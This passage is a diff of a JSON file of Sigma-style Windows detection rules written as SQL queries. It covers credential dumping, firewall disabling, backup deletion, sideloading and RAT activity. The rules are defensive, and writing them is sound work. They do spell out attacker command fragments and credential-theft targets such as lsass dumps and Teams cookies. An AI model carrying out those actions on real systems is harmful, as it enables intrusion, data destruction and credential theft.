ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", 
"status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + 
"description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ "attack.impact", - "attack.t1485" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 
'%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim 
Rauch", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.privilege_escalation", + 
"attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program 
Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 
'%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": 
"Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "status": "test", - "description": "Adversaries may modify system firewalls in order 
to bypass controls limiting network usage", - "author": "frack113", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard 
expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", 
"status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Very unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_hktl_dumpert.yml" - }, - { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "falsepositives": [ - "Printer software / driver installations", - "HP software" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 
